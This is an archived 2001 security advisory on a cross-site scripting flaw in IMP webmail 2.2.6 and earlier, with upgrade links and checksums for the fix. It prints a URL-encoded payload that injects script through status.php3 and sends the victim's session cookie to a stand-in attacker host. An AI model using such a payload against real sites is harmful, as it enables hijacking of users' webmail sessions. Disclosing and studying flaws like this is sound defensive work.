TUCoPS :: Web :: Apps :: web4852.htm

IMP cross-site script attack
12th Nov 2001 [SBWID-4852]
COMMAND

	IMP

SYSTEMS AFFECTED

	 IMP 2.2.6 and lower

	 Not vulnerable : 2.2.7, dev versions 2.3 and 3.0

PROBLEM

	João Pedro Gonçalves found that it\'s possible to hijack an IMP  webmail
	session using a cross-site script attack,  quite   similar  to  the  one
	explored by Marc Slemko in his \"Microsoft Passport to  Trouble\"  paper
	(http://alive.znep.com/~marcs/passport/)
	

	To exploit this vulnerability using a text message, the  attacker  sends
	an email with a url, where if the user clicks, is redirected to
	

	

	http://myimp.site.com/status.php3?message=%3Cscript%20language%3Djavascript

	%3E%20document.write(%27%3Cimg%20src%3Dhttp%3A%2F%2Fattackerhost.co

	m%2Fcookie.cgi%3Fcookie%3D%27%20%2B%20escape(document.cookie)%2B%

	20%27%3E%27)%3B%3C%2Fscript%3E%0A

	

	

	which in return redirects the user\'s browser to the attacker\'s  server
	where he hijacks the cookies that the browser used  in  the  context  of
	the webmail site, and the session therefore.

SOLUTION

	Upgrade to 2.2.7
	

	Packages can be found on :
	

	ftp://ftp.horde.org/pub/horde/

	ftp://ftp.horde.org/pub/imp/

	

	

	MD5 checksums:
	

	2433ed0e67739c41021b1a9397130a96  horde-1.2.7.tar.gz

	b5c683e1dc862fd185c9be0ce7188894  imp-2.2.7.tar.gz

	818199bc9a92cff07d109c4b43a22ffe  patch-horde-1.2.6-1.2.7.gz

	556ddcabc72048ae53f4cfb00680e6f5  patch-imp-2.2.6-2.2.7.gz

	

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH